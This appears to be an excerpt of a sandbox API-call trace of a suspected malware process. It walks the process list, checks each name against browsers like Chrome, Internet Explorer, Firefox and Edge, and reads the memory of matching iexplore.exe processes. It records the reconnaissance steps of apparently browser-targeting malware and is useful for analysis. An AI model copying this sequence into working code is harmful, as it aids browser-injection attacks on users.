	[0199.150] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.150] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0199.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.150] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.151] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0199.151] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x1880
	[0199.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.151] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0199.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.152] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.152] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0199.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.152] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.153] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0199.153] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1884
	[0199.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.153] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0199.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.154] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.154] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0199.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.155] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.155] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0199.163] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1888
	[0199.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.163] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0199.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.164] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.164] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0199.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.164] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.164] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0199.165] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x188c
	[0199.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.165] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0199.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.166] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.166] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0199.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.167] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.167] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0199.168] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x1890
	[0199.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.168] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0199.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.168] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.169] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0199.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.169] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.170] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0199.170] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1894
	[0199.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.170] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0199.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.171] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.171] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0199.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.171] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.171] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0199.172] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1898
	[0199.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.172] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0199.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.172] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.173] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0199.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.173] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.173] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0199.174] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x189c
	[0199.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.174] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0199.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.174] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.175] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0199.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.175] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.176] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0199.176] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x18a0
	[0199.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.176] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0199.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.177] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.178] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0199.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.178] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.179] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0199.180] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x18a4
	[0199.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.180] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0199.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.181] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.182] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0199.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.182] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.182] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0199.183] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x18a8
	[0199.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.183] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0199.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.184] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.185] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0199.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.185] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.186] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0199.186] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x18ac
	[0199.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.187] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0199.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.187] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.188] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0199.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.188] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.188] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0199.189] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x18b0
	[0199.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.189] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0199.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.190] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0199.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.190] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0199.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.190] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.190] NtQueryInformationProcess (in: ProcessHandle=0x18b0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0199.190] ReadProcessMemory (in: hProcess=0x18b0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0199.190] ReadProcessMemory (in: hProcess=0x18b0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0199.191] ReadProcessMemory (in: hProcess=0x18b0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0199.191] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0199.191] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0199.192] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x18b4
	[0199.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.192] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0199.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.192] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0199.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.193] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0199.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.193] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.194] NtQueryInformationProcess (in: ProcessHandle=0x18b4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0199.194] ReadProcessMemory (in: hProcess=0x18b4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0199.194] ReadProcessMemory (in: hProcess=0x18b4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0199.194] ReadProcessMemory (in: hProcess=0x18b4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0199.194] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0199.194] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0199.195] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x18b8
	[0199.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.195] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0199.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.195] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.195] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0199.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.196] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.196] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0199.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x18bc
	[0199.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.197] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0199.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.197] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.198] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0199.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.198] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.198] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.199] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x18c0
	[0199.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.199] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.199] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.200] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.200] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.200] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.201] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0199.201] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x18c4
	[0199.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.202] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.202] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.202] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.202] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.203] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.203] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x18c8
	[0199.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.203] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.204] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.204] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.204] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.205] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0199.205] CloseHandle (hObject=0x188) returned 1
	[0199.205] Sleep (dwMilliseconds=0x64) 
	[0199.307] GetCurrentProcessId () returned 0x110
	[0199.307] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0199.311] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0199.313] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0199.315] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0199.316] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x18cc
	[0199.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.316] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0199.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.317] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.317] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0199.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.317] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.318] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0199.318] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x18d0
	[0199.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.318] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0199.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.319] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.319] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0199.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.319] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
